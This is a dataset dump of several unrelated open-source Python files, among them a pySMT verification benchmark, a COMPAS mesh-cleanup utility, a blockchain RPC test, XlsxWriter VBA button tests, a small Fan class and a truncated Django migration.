c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc = Location(env, mgr.LE(z, i_0))
loc.set_progress(0, mgr.Equals(x_z, z))
h_z = Hint("h_z0", env, frozenset([z]), symbs)
h_z.set_locs([loc])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_0))
loc0.set_progress(1, mgr.Equals(x_pc, i_1))
loc1 = Location(env, mgr.Equals(pc, i_1))
loc1.set_progress(2, mgr.Equals(x_pc, i_2))
loc2 = Location(env, mgr.Equals(pc, i_2))
loc2.set_progress(0, mgr.Equals(x_pc, i_3))
loc3 = Location(env, mgr.Equals(pc, i_3))
loc3.set_progress(0, mgr.Equals(x_pc, i_0))
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2, loc3])
res.append(h_pc)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_z, y))
loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3))
loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x)))
h_z = Hint("h_z3", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| 34.981735
| 81
| 0.530087
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = mgr.And(
mgr.Implies(pcend, x_pcend),
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
mgr.Implies(pcs[3], x_pcs[4]),
mgr.Implies(pcs[4], x_pcs[2]))
labels = mgr.And(
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
trans = mgr.And(cfg, labels)
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc = Location(env, mgr.LE(z, i_0))
loc.set_progress(0, mgr.Equals(x_z, z))
h_z = Hint("h_z0", env, frozenset([z]), symbs)
h_z.set_locs([loc])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_0))
loc0.set_progress(1, mgr.Equals(x_pc, i_1))
loc1 = Location(env, mgr.Equals(pc, i_1))
loc1.set_progress(2, mgr.Equals(x_pc, i_2))
loc2 = Location(env, mgr.Equals(pc, i_2))
loc2.set_progress(0, mgr.Equals(x_pc, i_3))
loc3 = Location(env, mgr.Equals(pc, i_3))
loc3.set_progress(0, mgr.Equals(x_pc, i_0))
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2, loc3])
res.append(h_pc)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_z, y))
loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3))
loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x)))
h_z = Hint("h_z3", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| true
| true
|
f705dfb5b1b2d9fb7211529c9252df251ac0bfc7
| 2,270
|
py
|
Python
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas/datastructures/mesh/core/clean.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
__all__ = [
'mesh_delete_duplicate_vertices'
]
def mesh_delete_duplicate_vertices(mesh, precision=None):
"""Cull all duplicate vertices of a mesh and sanitize affected faces.
Parameters
----------
mesh : Mesh
A mesh object.
precision : str (None)
A formatting option that specifies the precision of the
individual numbers in the string (truncation after the decimal point).
Supported values are any float precision, or decimal integer (``'d'``).
Default is ``'3f'``.
Returns
-------
None
The mesh is modified in-place.
Examples
--------
>>> import compas
>>> from compas.datastructures import Mesh
>>> mesh = Mesh.from_obj(compas.get('faces.obj'))
>>> mesh.number_of_vertices()
36
>>> for x, y, z in mesh.vertices_attributes('xyz', keys=list(mesh.vertices())[:5]):
... mesh.add_vertex(x=x, y=y, z=z)
...
36
37
38
39
40
>>> mesh.number_of_vertices()
41
>>> mesh_delete_duplicate_vertices(mesh)
>>> mesh.number_of_vertices()
36
"""
key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()}
gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())}
for key in list(mesh.vertices()):
test = gkey_key[key_gkey[key]]
if test != key:
del mesh.vertex[key]
del mesh.halfedge[key]
for u in mesh.halfedge:
nbrs = list(mesh.halfedge[u].keys())
for v in nbrs:
if v == key:
del mesh.halfedge[u][v]
for fkey in mesh.faces():
seen = set()
face = []
for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]:
if key not in seen:
seen.add(key)
face.append(key)
mesh.face[fkey] = face
for u, v in mesh.face_halfedges(fkey):
mesh.halfedge[u][v] = fkey
if u not in mesh.halfedge[v]:
mesh.halfedge[v][u] = None
| 28.734177
| 119
| 0.584141
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
__all__ = [
'mesh_delete_duplicate_vertices'
]
def mesh_delete_duplicate_vertices(mesh, precision=None):
key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()}
gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())}
for key in list(mesh.vertices()):
test = gkey_key[key_gkey[key]]
if test != key:
del mesh.vertex[key]
del mesh.halfedge[key]
for u in mesh.halfedge:
nbrs = list(mesh.halfedge[u].keys())
for v in nbrs:
if v == key:
del mesh.halfedge[u][v]
for fkey in mesh.faces():
seen = set()
face = []
for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]:
if key not in seen:
seen.add(key)
face.append(key)
mesh.face[fkey] = face
for u, v in mesh.face_halfedges(fkey):
mesh.halfedge[u][v] = fkey
if u not in mesh.halfedge[v]:
mesh.halfedge[v][u] = None
| true
| true
|
f705dfc786bdc45229a3f652451375438bf1d183
| 2,856
|
py
|
Python
|
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/blockchain.py
|
dnoiz1/ruxcoin
|
07e30a2b5ebc624ac8a2d92be435e895ede5deae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Ruxcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test RPC calls related to blockchain state. Tests correspond to code in
# rpc/blockchain.cpp.
#
from decimal import Decimal
from test_framework.test_framework import RuxcoinTestFramework
from test_framework.authproxy import JSONRPCException
from test_framework.util import (
assert_equal,
assert_raises,
assert_is_hex_string,
assert_is_hash_string,
start_nodes,
connect_nodes_bi,
)
class BlockchainTest(RuxcoinTestFramework):
"""
Test blockchain-related RPC calls:
- gettxoutsetinfo
- verifychain
"""
def __init__(self):
super().__init__()
self.setup_clean_chain = False
self.num_nodes = 2
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split = False
self.sync_all()
def run_test(self):
self._test_gettxoutsetinfo()
self._test_getblockheader()
self.nodes[0].verifychain(4, 0)
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], 200)
assert_equal(res['height'], 200)
assert_equal(res['txouts'], 200)
assert_equal(res['bytes_serialized'], 13924),
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized']), 64)
def _test_getblockheader(self):
node = self.nodes[0]
assert_raises(
JSONRPCException, lambda: node.getblockheader('nonsense'))
besthash = node.getbestblockhash()
secondbesthash = node.getblockhash(199)
header = node.getblockheader(besthash)
assert_equal(header['hash'], besthash)
assert_equal(header['height'], 200)
assert_equal(header['confirmations'], 1)
assert_equal(header['previousblockhash'], secondbesthash)
assert_is_hex_string(header['chainwork'])
assert_is_hash_string(header['hash'])
assert_is_hash_string(header['previousblockhash'])
assert_is_hash_string(header['merkleroot'])
assert_is_hash_string(header['bits'], length=None)
assert isinstance(header['time'], int)
assert isinstance(header['mediantime'], int)
assert isinstance(header['nonce'], int)
assert isinstance(header['version'], int)
assert isinstance(int(header['versionHex'], 16), int)
assert isinstance(header['difficulty'], Decimal)
if __name__ == '__main__':
BlockchainTest().main()
| 31.733333
| 73
| 0.678221
|
from decimal import Decimal
from test_framework.test_framework import RuxcoinTestFramework
from test_framework.authproxy import JSONRPCException
from test_framework.util import (
assert_equal,
assert_raises,
assert_is_hex_string,
assert_is_hash_string,
start_nodes,
connect_nodes_bi,
)
class BlockchainTest(RuxcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = False
self.num_nodes = 2
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split = False
self.sync_all()
def run_test(self):
self._test_gettxoutsetinfo()
self._test_getblockheader()
self.nodes[0].verifychain(4, 0)
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], 200)
assert_equal(res['height'], 200)
assert_equal(res['txouts'], 200)
assert_equal(res['bytes_serialized'], 13924),
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized']), 64)
def _test_getblockheader(self):
node = self.nodes[0]
assert_raises(
JSONRPCException, lambda: node.getblockheader('nonsense'))
besthash = node.getbestblockhash()
secondbesthash = node.getblockhash(199)
header = node.getblockheader(besthash)
assert_equal(header['hash'], besthash)
assert_equal(header['height'], 200)
assert_equal(header['confirmations'], 1)
assert_equal(header['previousblockhash'], secondbesthash)
assert_is_hex_string(header['chainwork'])
assert_is_hash_string(header['hash'])
assert_is_hash_string(header['previousblockhash'])
assert_is_hash_string(header['merkleroot'])
assert_is_hash_string(header['bits'], length=None)
assert isinstance(header['time'], int)
assert isinstance(header['mediantime'], int)
assert isinstance(header['nonce'], int)
assert isinstance(header['version'], int)
assert isinstance(int(header['versionHex'], 16), int)
assert isinstance(header['difficulty'], Decimal)
if __name__ == '__main__':
BlockchainTest().main()
| true
| true
|
f705e0706875e8cf396e8b98af019ceeec2c23b1
| 1,971
|
py
|
Python
|
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-07-01T07:24:37.000Z
|
2020-07-01T07:24:37.000Z
|
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/comparison/test_button07.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('button07.xlsm')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
workbook.set_vba_name()
worksheet.set_vba_name()
worksheet.insert_button('C2', {'macro': 'say_hello',
'caption': 'Hello'})
workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin')
workbook.close()
self.assertExcelEqual()
def test_create_file_explicit_vba_names(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
workbook.set_vba_name('ThisWorkbook')
worksheet.set_vba_name('Sheet1')
worksheet.insert_button('C2', {'macro': 'say_hello',
'caption': 'Hello'})
workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin')
workbook.close()
self.assertExcelEqual()
def test_create_file_implicit_vba_names(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_button('C2', {'macro': 'say_hello',
'caption': 'Hello'})
workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin')
workbook.close()
self.assertExcelEqual()
| 26.28
| 79
| 0.598681
| true
| true
|
|
f705e11b73b8ab51a2717f76d0f1699b82a7b0ae
| 258
|
py
|
Python
|
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
biot/core/fan.py
|
AroliantBIoT/biot-orangepi-client
|
60df602816cdc0c668e58f91512e93eb5bec3c6d
|
[
"MIT"
] | null | null | null |
class Fan():
"""Default Device with ON / OFF Functions"""
deviceID = None
def __init__(self, deviceID):
if deviceID is None:
print("Provide a Device ID")
return
self.deviceID = deviceID
def setSpeed(self):
pass
def getSpeed(self):
pass
| 16.125
| 45
| 0.678295
|
class Fan():
deviceID = None
def __init__(self, deviceID):
if deviceID is None:
print("Provide a Device ID")
return
self.deviceID = deviceID
def setSpeed(self):
pass
def getSpeed(self):
pass
| true
| true
|
f705e133aa7892ba240c4677420a97b286673317
| 3,271
|
py
|
Python
|
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
projects_api/migrations/0001_initial.py
|
diegoinn/profile-rest-api
|
a5b8c9dfe5453db24e93d05367d33e6f37c65966
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2020-10-29 04:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ConstructionSystem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_construction_system', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Material',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_material', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Origin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_origin', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_project', models.CharField(max_length=255)),
('use', models.CharField(max_length=255)),
('builded_surface', models.IntegerField()),
('living_area', models.IntegerField()),
('tier', models.IntegerField()),
('useful_life', models.IntegerField()),
],
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_section', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Unit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
